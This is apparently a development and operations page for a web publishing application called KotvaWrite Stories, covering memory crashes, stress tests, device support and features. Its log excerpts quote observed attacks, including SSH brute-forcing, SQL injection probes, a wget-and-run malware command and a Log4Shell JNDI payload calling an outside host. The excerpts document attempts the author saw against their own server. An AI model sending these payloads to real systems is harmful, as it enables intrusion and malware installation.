KWS - Experimental - KotvaWrite Stories

Even when running on a single server KotvaWrite Stories could easily be left for a month without any special monitoring if the number of concurrent users is not overly high. An exception to this assumption may be made in mysterious cases where the memory and disk usage of a virtual server (Linux) momentarily rise quickly and stay in that state for some time. That could crash the application server on which the publishing application is installed. The consequences may not be too critical, as any unfinished database and file saves can/should be fixed and cleaned up semi-automatically, after which a simple restart of the application server might be sufficient to get things back to normal. However, if there is a large number of hacking attempts involved, some OS-level resources may be exhausted, such as the number of open files ("files that are currently being reviewed or modified").

By looking through the log file of the kernel of a Linux operating system in use, one may notice that the Java process has run out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)
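Entries like the ones above can be picked out of a kernel log programmatically. The following is a minimal sketch, assuming the log lines have the human-readable timestamp format shown here; the function name `find_oom_kills` is hypothetical and not part of the publishing application.

```python
import re
from datetime import datetime

# Matches kernel log lines of the form shown above, e.g.
# "[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)"
OOM_LINE = re.compile(
    r"^\[(?P<when>[^\]]+)\] Out of memory: Killed process "
    r"(?P<pid>\d+) \((?P<name>[^)]+)\)"
)


def find_oom_kills(lines):
    """Return (timestamp, pid, process name) for every OOM kill line."""
    kills = []
    for line in lines:
        match = OOM_LINE.match(line.strip())
        if match is None:
            continue  # not an OOM kill entry
        when = datetime.strptime(match.group("when"), "%a %b %d %H:%M:%S %Y")
        kills.append((when, int(match.group("pid")), match.group("name")))
    return kills


sample = [
    "[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)",
    "[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)",
    "[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)",
]

for when, pid, name in find_oom_kills(sample):
    print(when.isoformat(), pid, name)
```

The timestamps returned this way can then be compared with the timestamps of other logs, such as the login attempts listed later in this article.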

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and the limits within which the associated Java process is allowed to use memory are configurable. Stress tests have shown that certain memory configurations are enough - until for some reason they are not.

On the Linux operating system where the publishing application is installed, two APM (Application Performance Monitoring) agents are installed separately. They collect information in real time about e.g. both the operating system and the publishing application, which can then be viewed in a variety of ways in the web interfaces of the APM services (which might be New Relic and Datadog). In these out of memory cases, one and the same thing has always been found to be true: the amount of web traffic has not been a significant factor at a time when virtual process usage has grown by e.g. a factor of 20 and a miraculously large amount of disk has been used in a short period of time. At such times, it is not surprising that database queries might take more than ten seconds to run instead of the normal few milliseconds.

In addition, there is also an external service such as Papertrail, which can be used for redirecting log data from several sources such as the application server and the operating system, so that the log data does not have to be read in a Linux shell, but can instead be viewed through a web interface. A notion about hackers has emerged from browsing the gathered logs. It seems that someone, or some wannabe hackers, have done a lot of crude experimentation to get through the defences of the operating system, application server and publishing application. This has been ongoing throughout 2022, but not once has there been an attempt at a Distributed Denial of Service (DDoS) attack. Instead there has been e.g. slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?

Contemplating the timing of the out of memory errors tends to lead to the notion that some of the hacking attempts happen just seconds before the memory runs out, but could that have something to do with not having dedicated servers? That means the same physical hardware resources are used by more than one datacenter client (in other words: a server is actually a so-called virtual server). Sometimes the actual hardware can cause failures, so the cause of the problems could also be something other than what can be seen in the available logs and in the dashboards displaying visualized data. However, the data centre service provider said that there was no anomaly to report at the time of the problematic out of memory events.

There are other explanations for out of memory errors and other strangely anomalous problems than those already mentioned. E.g. the application server might be way behind the latest version, and the same could apply to Java, the programming language used on the server side. There are separate settings for when and how the application server and Java clean up memory to remove things that are no longer needed, but they are rather generally left to their default settings. All of this is quite manageable, but may require lots of monitoring and testing to detect borderline cases.

The remainder of this article contains observations about a certain out of memory event. And if this is where one can send greetings to the administration of the publishing application, it should be mentioned that some additional configuration could be done to ensure that the IP addresses wouldn't appear as 127.0.0.1 in the application server logs, but as the original IP addresses. Although, could the General Data Protection Regulation (GDPR) have anything to say about this?

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]
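To get an overview of such attempts, the "Invalid user" lines can be counted per source address and per attempted username. This is a minimal sketch that assumes the sshd message format shown above; the function name `count_invalid_logins` is hypothetical.

```python
import re
from collections import Counter

# Matches only the first line of each attempt ("Invalid user X from IP port N"),
# not the follow-up "Disconnected from invalid user ..." lines.
INVALID_USER = re.compile(
    r"sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def count_invalid_logins(lines):
    """Count invalid-user login attempts per source IP and per username."""
    by_ip = Counter()
    by_user = Counter()
    for line in lines:
        match = INVALID_USER.search(line)
        if match:
            by_ip[match.group("ip")] += 1
            by_user[match.group("user")] += 1
    return by_ip, by_user


host = "snapshot-47300778-centos-2gb-hel1-1-final"
sample = [
    f"Oct 15 22:52:42 {host} sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716",
    f"Oct 15 22:52:42 {host} sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]",
    f"Oct 15 22:55:25 {host} sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284",
    f"Oct 15 23:29:58 {host} sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870",
]

by_ip, by_user = count_invalid_logins(sample)
print(by_ip.most_common())
print(by_user.most_common())
```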

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations of attempts to access a web interface that is not installed:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by typing parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787
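Requests like the ones above can be labelled roughly by looking for telltale substrings in the URL-decoded request target. The sketch below assumes the access log format shown here; the marker list is a hypothetical, non-exhaustive selection based only on the samples in this article, and the function name `classify` is made up for illustration.

```python
import re
from urllib.parse import unquote

# One access log line: client, two unused fields, timestamp, request, status, size.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Hypothetical markers (lowercase), checked in this order.
SUSPICIOUS_MARKERS = {
    "${jndi:": "JNDI lookup injection attempt",
    "/shell?": "remote shell command attempt",
    ".env": "environment file probe",
    "phpmyadmin": "phpMyAdmin probe",
    "wp-includes": "WordPress probe",
    "'": "possible SQL injection probe",
}


def classify(line):
    """Return (ip, status, label) for a suspicious request, else None."""
    match = ACCESS_LINE.match(line.strip())
    if match is None:
        return None
    # Decode percent-escapes so that e.g. %24%7Bjndi%3A becomes ${jndi:
    target = unquote(match.group("target")).lower()
    for marker, label in SUSPICIOUS_MARKERS.items():
        if marker in target:
            return match.group("ip"), int(match.group("status")), label
    return None


print(classify('127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764'))
```

A status of 200 in such a line does not by itself mean that an attempt succeeded; in the samples above it can simply mean that a normal page was returned regardless of the odd parameters.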

The second log on the application server (catalina) sometimes contains an experiment with imaginary weaknesses:

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens
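One possible reading of these entries, offered as an assumption rather than something the logs confirm: the bytes 0x16 0x03 0x01 at the start of the "method name" are what the beginning of a TLS handshake record looks like, so a client may simply have tried to speak HTTPS to the plain HTTP port. A minimal sketch of that check, with a hypothetical function name:

```python
def looks_like_tls_handshake(first_bytes: bytes) -> bool:
    """True if the bytes start like a TLS record carrying a handshake message."""
    return (
        len(first_bytes) >= 3
        and first_bytes[0] == 0x16   # record content type 22: handshake
        and first_bytes[1] == 0x03   # protocol major version 3
        and first_bytes[2] <= 0x04   # protocol minor version 0..4
    )


# First bytes as reported in the catalina log entries above.
print(looks_like_tls_handshake(bytes([0x16, 0x03, 0x01, 0x00])))
# An ordinary HTTP request starts with a method name instead.
print(looks_like_tls_handshake(b"GET / HTTP/1.1"))
```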

Differences in functionality across devices and browsers?

From a content production perspective, the publishing application has been developed on a "big screen and rollerball computers with physical keyboard first" basis, but time is sometimes spent ensuring that tablets and laptops with a sufficiently high resolution and size could also be suitable devices. For browsers, it seems to be easy to achieve an equal level of functionality, so the assumption has been made that functionality is good even on more exotic ones, provided that it has been verified with the most common browsers.

The publishing application functions well and equally on at least Edge, Firefox, Chrome and Safari.

In terms of user experience, a 32-inch monitor at 1440p resolution connected to a desktop computer seems like something of a sweet spot, but on the other hand, the Apple iPad Pro 12.9" is a device that fits all the views of the publishing interface just snugly enough. A separate physical keyboard is still recommended. Some functions may not be available on mobile devices if there is no separate keyboard connected, as the alternative would be to put more switches and buttons on the screen, which would in turn change the user experience. In some situations, the use of a wheel mouse is recommended, but not strictly necessary.

The Samsung Galaxy Tab S7 with its 11-inch screen has different dimensions to the iPad, which means that not all kinds of elements can fit side by side in portrait mode, but on the other hand the publishing interface adapts quickly to landscape mode. Also, using a browser in fullscreen always gives a bit more space, which is useful when using a laptop such as the ASUS ZenBook with its 14-inch screen.

The publishing application has also been tried on a Sony Xperia Z3 Compact Tablet, which has only moderate power and a screen size of only 8 inches. Technically the publishing service works normally on it, but the different parts of a view of the user interface have to be placed one above another in accordance with the principles of responsive user interface design, so there's quite a bit of scrolling required.

As for controllers, the Samsung Stylus Pen is very handy and recommended for compatible devices, offering not only very good sensitivity and accuracy, but also the hover feature that Apple Pencil lacks.

The instructions may refer to the use of the Ctrl key (Windows) in certain situations, but the Meta key (Mac) can also be used to access those functionalities.

When using or buying a laptop computer, it is recommended that it has arrow keys that aren't squeezed to fit in their place, as otherwise one needs to consciously think about using them, motor movement slows down and the flow of thought gets interrupted unnecessarily.

Stress testing results using one virtual server

Virtual server processor load due to utilization

When there is not enough CPU power available because of the modest vcpu level of the virtual server, the load on the application server starts to show up in the CPU utilization, which is visualized here in the graph as it is shown in the Hetzner web interface. It shows that instantaneous CPU utilizations have been considerably higher than they usually are.

The same level of load can also be characterised in e.g. the Datadog monitoring service, which in this case shows how increasing the number of visitors per minute by a thousand, and again by a thousand, etc., has resulted in an ever-increasing load.

Excessive queuing of visitors causes delays in processing

test page: writing with a couple of dozen paragraphs of text and a few images

page loads: 8000 per minute

vcpu: 4

maxthreads: 3 - 4

survivability: when the server is not configured to handle many visitors at once, visitors have to wait longer to be processed, but even setting maxthreads higher by just one can be enough to stabilise response times

Front pages of solutions often cause only minimal load

test page: front page of a solution, about forty writings in a few collections of writings, shown using front type of plain structure

page loads: 10000 per minute

vcpu: 4

survivability: uncached page loads with a smooth response time of about 110 ms, with a maximum of 200 visitors per second

Simultaneous processing of image uploads causes wavering in response times

test page: front page of a solution, about forty writings in a few collections of writings, shown using front type of plain structure

concurrency: throughout the test, the same virtual server receives one 1920x1080 pixel image at a time and scales it to different sizes

page loads: 10000 per minute

vcpu: 4

survivability: slight wavering in response times, but no more than about 40 seconds, when the maximum number of visitors is 200 per second

Thousands of writing collections can be loaded with lesser server resources

test page: all the about 30 writings from a writing collection loaded at once

page loads: 4000 per minute

vcpu: 4

survivability: response times remain reasonably low, but there is constant chatter

A few tens of thousands of writings can be loaded per minute by increasing the processing power

test page: a writing having twenty paragraphs and a few images

page loads: 35000 per minute

vcpu: 8

maxthreads: 140

survivability: steadily increasing the number of visitors increases the response times quite correlatively for a writing that would be loaded separately in about 80 ms, and the response times do not stabilize, but 35000 page loads per minute with a good average loading speed of 250 ms is not a bad test result at all
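The relation between page loads per minute, response time and the number of requests being processed at once can be estimated with Little's law (average number in the system = arrival rate x average time in the system). The sketch below is an illustration under the assumption of a steady state where each request occupies one thread for its whole response time; that assumption is not part of the test results. With the figures of this test it gives roughly 146 requests in flight, which is in the same range as the maxthreads value of 140.

```python
def concurrent_requests(page_loads_per_minute: float, response_time_ms: float) -> float:
    """Little's law: average requests in flight = arrival rate x response time."""
    arrivals_per_second = page_loads_per_minute / 60.0
    return arrivals_per_second * (response_time_ms / 1000.0)


# 35000 page loads per minute at an average of 250 ms (vcpu 8, maxthreads 140)
print(f"{concurrent_requests(35000, 250):.1f}")  # prints 145.8

# 10000 page loads per minute at about 110 ms (front page test, vcpu 4)
print(f"{concurrent_requests(10000, 110):.1f}")  # prints 18.3
```

Read the other way round, the same relation hints at why a very low maxthreads value forces visitors to queue: when the estimated number of requests in flight exceeds the number of threads, the excess has to wait.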

Nearly ten thousand writing collections can be loaded by increasing the processing power

test page: a writing collection having 30 writings loaded at a time

page loads: 4000 - 9000 per minute

vcpu: 8

survivability: response times improve by almost 100 milliseconds compared to vcpu 4 and remain more or less stable, staying at that level up to 7000 page loads per minute, but 8000 starts to become more difficult for the server and 9000 was then more or less impossible to test without timeouts growing very high

Steady increase in visitor numbers makes it difficult to stabilise response times

test page: a writing collection having 10 writings loaded at a time

page loads: 10000 per minute

vcpu: 8

survivability: doubling the number of vcpus from 4 makes it possible to pass the test that lasts for a minute, but a steady increase in the number of visitors increases the response times quite correlatively

Timeout errors may be caused by configuring the server imprudently

test page: a writing collection having 10 writings loaded at a time

vcpu: 4

survivability: when a Tomcat server is configured in an imprudent manner, it can become badly overloaded, with visitors being forced to queue up and some not getting fully processed

Automated messaging to customers and authenticated users

A wide range of situation reports, early warnings etc. could be collected, generated and communicated in abundance, and there are a variety of applications for their management, from Linux utilities to web applications. The usability and applicability of these will be explored.

It could be useful for the customer and the authenticated users to have some sense of e.g. the current state of the server(s). Or at a higher level of abstraction, prior knowledge of increased attention toward some solutions or writings in the publishing application, and of its consequences, could help in making some kind of preparations.

Tighter UI

In the user settings, there is a Tighter UI option, which slightly reduces the size of almost all fonts in the user interface of a regular user and reduces the space taken up by some visual elements. This is useful e.g. on laptops that don't have a very large screen. On the iPad Pro and many other tablets, the Tighter UI setting may feel appropriate whether it is enabled or not.

Studying mode

In the user settings there is an option that can be enabled for "studying mode", which is only applicable in the text editing view. This adds a toggle button named "Studying mode" to that view, which, when turned on, imposes some editing restrictions on the writings, and the functionality of the table listing the writings becomes such that one can mark which writings are e.g. recommended to be studied next and which perhaps later. These markings are entirely visual, which means that they don't have an exact definition. They can be set by Ctrl-clicking on the writing names.

These to-study markings are saved with the writings in the solution so that they are also stored in the backup of the relevant project. Thus, one could prepare something to study for others and give them a copy of the backup file, which they could import to their instance of the publishing application. By turning off the studying mode, the text editing view is restored to normal. With studying mode enabled, all those markings can be cleared from the writings of a writing collection by clicking on "Clear study markings".

Printable version of a solution

Any solution that has been prepared for online reading can be made into a PDF version with a single click of the relevant button. The resulting PDF will contain a separate cover page and all collections of writings in their own parts with all printable contents. Page numbers in the footers with section information and before/after special pages are included. Images will be positioned as well as on the web, font choices are exactly right and otherwise the results are generally just fine. Currently it is preferred to use the content list type "plain structure", as others like "presentation page" and the blog-like one would give unexpected results. Instead of the whole solution, one can limit the use of the function to a selected writing collection.

This has been done in a completely different way to the previous attempt, where a TeX file was first generated, containing both styling and content, and then a PDF file was generated from it. Instead, the external service generates the PDF file from the same ingredients that browsers use to generate web pages, i.e. HTML code, CSS styling and JavaScript code. An important addition is the use of CSS3 Paged Media:

"CSS module specifies how pages are generated and laid out to hold fragmented content in a paged presentation. It adds functionality for controlling page margins, page size and orientation, and headers and footers, and extends generated content to enable page numbering and running headers / footers." (CSS Paged Media Module Level 3. W3C Working Draft, 18 October 2018.)

Many browsers have not implemented this standard and that is why printing directly from the browser does not provide optimal results as such, when the purpose is to include page numbering etc. E.g. the Firefox browser does not make much use of CSS Paged Media (since last tested), but Edge and Chrome do. However, a problem with using them is that they either include extra information like the date in the header and footer, or the header and footer contents have to be completely empty (the printing settings only have an either/or option). There is a button for making a printable version of the whole solution and icons for doing the same just for a writing collection.

Actually, as the external service that is supposed to be used for generating PDF files requires a fee to be paid, the process has been shortened by one phase so that the user is served a downloadable HTML file that contains all the mentioned "ingredients" and content. The user can then use a browser to print it, if the browser has enough support for CSS3 Paged Media.

There is only one adjustment for this in the adjustments of a solution, the font size multiplier. Choosing option "1.00" works appropriately when printing at A4 size, affecting all text sizes in a writing (headings, captions, etc.). This does not affect redirectlink writings, which are affected by the same setting on target solutions.
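To give an idea of what such a self-contained printable HTML file can look like, here is a minimal sketch that builds one with a CSS Paged Media `@page` rule, a page counter in the footer and a font size multiplier. It is an illustration only, not the generator used by the publishing application: the function name `build_printable_html`, the 12pt base size and the 20mm margin are assumptions. Whether the page number actually appears depends on the browser's support for page margin boxes.

```python
from html import escape


def build_printable_html(title, parts, font_multiplier=1.00):
    """Build one HTML document with print styling for A4 paper.

    parts is a list of (heading, text) tuples, one per writing collection.
    """
    css = (
        "@page { size: A4; margin: 20mm;\n"
        "  @bottom-center { content: counter(page); } }\n"  # page number footer
        "section { break-before: page; }\n"                 # each part on a new page
        f"body {{ font-size: {12 * font_multiplier:.2f}pt; }}\n"
    )
    body = "".join(
        f"<section><h2>{escape(heading)}</h2><p>{escape(text)}</p></section>"
        for heading, text in parts
    )
    return (
        '<!DOCTYPE html><html><head><meta charset="utf-8">'
        f"<title>{escape(title)}</title><style>{css}</style></head>"
        f"<body><h1>{escape(title)}</h1>{body}</body></html>"
    )


html_text = build_printable_html(
    "Example solution",
    [("First collection", "Text of a writing."), ("Second collection", "More text.")],
)
print(len(html_text), "characters of printable HTML")
```

Putting the multiplier on the body font size and sizing everything else relative to it is one way to make a single setting affect headings and captions alike.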

Export to a desktop publishing software

The desktop publishing software InDesign has for a long time allowed all its functionality to be controlled by ExtendScript, so after a while of exploring InDesign's API, it became clear that it can indeed be used to do what had already been envisioned and what the LaTeX typesetting system was not dexterous enough for. A backup of a project (zip package) contains all the essentials for creating an InDesign version, and in practice all that is needed is to run a single script in InDesign that first asks which directory the decompressed files are in and then generates the same work in a different form based on the available writings, style definitions etc.

Processing images in plentiful amounts

The image selections made in the "image assorting" view can be used in some other views by first storing essential information about them to the clipboard. In the "picture processing" view it means e.g. using the results of image analysis in some ways. More than one analysis process can be run at a time. When applying e.g. text recognition to an image or images, the results are shown after a short while and can then be copied for use elsewhere, or be used right away by making a Google Search or Brave Search from a text selection, which results in displaying the first few web pages.

Posting to microblogs, social networks like Mastodon, Bluesky etc.

This is just a preliminary examination of what kind of e.g. coding it takes to send text with an image to a microblogging service where one might want to share something that was published. At least for Mastodon and Bluesky, the user would of course be required to create a user account, and also to create an application in its settings, to which a message can be sent programmatically (via an API) for publishing.

Creating an application in the settings of a microblogging service is not a difficult operation in itself. It mainly requires giving it a name, after which an API key or similar gets generated, which should then be stored in the user settings of the publishing application.

It was also examined how readable the developer documentations are and if they leave many open questions.

This is not necessarily relevant to a user of the publishing application, but some may be interested in the amount of code required to post to these microblogging services. Here are a couple of code snippets to give some idea.
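The following is an illustrative sketch rather than the code used in the publishing application. It only builds the HTTP requests for a text-only post and does not send them. The endpoints used are Mastodon's `POST /api/v1/statuses` and Bluesky's `com.atproto.repo.createRecord`; the function names, the example hosts and the token values are hypothetical. Attaching an image would need a separate upload step on both services, which is left out here.

```python
import json
from datetime import datetime, timezone
from urllib.parse import urlencode
from urllib.request import Request


def mastodon_status_request(instance_url, access_token, text):
    """Build (but do not send) a request that posts a status to Mastodon."""
    return Request(
        f"{instance_url.rstrip('/')}/api/v1/statuses",
        data=urlencode({"status": text}).encode("utf-8"),
        headers={"Authorization": f"Bearer {access_token}"},
        method="POST",
    )


def bluesky_post_request(pds_url, access_jwt, did, text):
    """Build (but do not send) a request that creates a Bluesky post record.

    access_jwt and did are assumed to come from an earlier session request
    (com.atproto.server.createSession), which is not shown here.
    """
    record = {
        "$type": "app.bsky.feed.post",
        "text": text,
        "createdAt": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
    }
    payload = {"repo": did, "collection": "app.bsky.feed.post", "record": record}
    return Request(
        f"{pds_url.rstrip('/')}/xrpc/com.atproto.repo.createRecord",
        data=json.dumps(payload).encode("utf-8"),
        headers={
            "Authorization": f"Bearer {access_jwt}",
            "Content-Type": "application/json",
        },
        method="POST",
    )


request = mastodon_status_request("https://mastodon.example", "TOKEN", "Hello world")
print(request.get_method(), request.full_url)
# Sending would be: urllib.request.urlopen(request)
```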

Browser addons for fixing grammatical mistakes

To aid in fixing grammatical mistakes, detecting errors in using words etc. a browser add-on can be installed which, after registering as a user and logging in to the add-on, will check the text and mark parts of it that might need correcting. These add-ons probably don't need to be configured or adjusted. Changes can be accepted directly in the text editor.

As a kind of gateway theory, when registering as a user to such a service, one may discover that they offer other features such as AI-assisted text generation. In a way, this is the opposite of what this publishing application was intended to be, at least originally, i.e. primarily to create something yourself, with some additional functionality or external service e.g. as a helper and/or checker, if one wants to use them. It probably won't be a bad thing, since e.g. having AI rephrase what is already written is a rather similar operation to language translation, which is already implemented as a feature.

Appealing to the reader with well-chosen writing names and mainimages

Well-chosen writing names and mainimages can be used to characterise the content of a writing in a way that appeals to the reader. Mainimages can also be used e.g. to set a tone, be sarcastic or create the feeling that some writings are related to each other.

AI-aided image analysis and image retrieval by text queries

In the "AI image search" view images can be searched by text after AI analysis of images. The images found are displayed in the same way as in the particular browsing view and can be drag'n'dropped for use in writings.

Before images can be searched using text they must first be analysed by an AI, of which there are several options to choose from. The AI analysis per image is at this stage intended to work in such a way that there is no need to send the images to another service and instead all the analysis is done on the server(s) that the client may already be using. This may impose limitations on how quickly images can be analysed, as some AI models require a lot of computational power from the processor.

Some AI models may take tens of seconds to analyse a few hundred images, others minutes. The results of image analysis are automatically stored in a database so that they are available for comparison when retrieving images using text queries.

The analysis results of the different AI models are not compatible with each other, but the user interface has been designed so that it provides clear indicators of which AI model has been used for which image containers.

After the first image analyses, the images can already be searched using text queries and if more images are added to image containers later, a clear indicator of the missing image analyses is presented, so one could know which image container the image analysis should be applied to. Background image analysis would also be an implementation option, but it has its risks, e.g. in terms of excessive server load.

Preliminary experiments show that the search results are pleasantly reliable, e.g. when searching for "city streets", the search results do match the query. The analysis results can be deleted per image container and per AI by Ctrl-clicking on the name of the AI model.

The results of the image analyses are stored in the same database management system that is already used for storing data such as writing related data, i.e. MariaDB. Newer versions of the database have the possibility of using vector data, which is very suitable for the purpose. In the past, the use of a separate vector database (e.g. Qdrant, Pinecone or Weaviate) had been considered.
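The idea behind searching images with stored vector data can be sketched as follows: each analysed image has a vector, the text query is turned into a vector by the same AI model, and the images whose vectors are closest to the query vector are returned. This is a toy illustration with made-up three-dimensional vectors and cosine similarity as the assumed measure; the article does not state which measure or model is used, and in practice the comparison would be done by the database rather than in application code.

```python
import math


def cosine_similarity(a, b):
    """Cosine of the angle between two equally long vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def search_images(query_vector, image_vectors, top_k=3):
    """Return the ids of the top_k images most similar to the query vector."""
    scored = [
        (cosine_similarity(query_vector, vector), image_id)
        for image_id, vector in image_vectors.items()
    ]
    scored.sort(reverse=True)  # highest similarity first
    return [image_id for _, image_id in scored[:top_k]]


# Hypothetical analysis results: image id -> vector produced by one AI model.
image_vectors = {
    "street.jpg": [0.9, 0.1, 0.0],
    "forest.jpg": [0.0, 1.0, 0.0],
    "harbour.jpg": [0.5, 0.5, 0.0],
}
query = [1.0, 0.0, 0.0]  # stands in for the vector of a query like "city streets"
print(search_images(query, image_vectors, top_k=2))
```

Because vectors from different models live in different spaces, a comparison like this only makes sense between a query and images analysed with the same model.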

To be contemplated later is whether the analysis of images could/should be done in a separate service with a large amount of computing resources available. Currently, it is possible to increase performance by directing computationally intensive operations away from a virtual server and toward e.g. a dedicated server. However, it seems that a single virtual server is rather sufficient to momentarily utilize an AI model without e.g. running out of memory on the server. Admittedly, AI-based image analysis currently uses images in their 360 pixels wide version. When using much larger ones, all the resources on a server would run out quite quickly.

The results of AI image analysis are not stored in project backups, so if a project and its image catalogs are deleted, the related image analysis results would also be gone.

Screenshots from a tablet device to quick saves

Motivation, timing, etc., can be a reason for not starting something at the very moment when, while browsing the web, one notices something worth capturing that may have at least some use for something. In such a case, a saved screenshot together with the address of the web page seen should be enough to remind one of what one was about to write about.

An Android application has been developed on the Minimum Viable Product principle, intended for use only on Android tablets running at least Android 11. The application is logged in to with a username and session code, i.e. the login with password must have already taken place in order for the session code to be available and accessible.

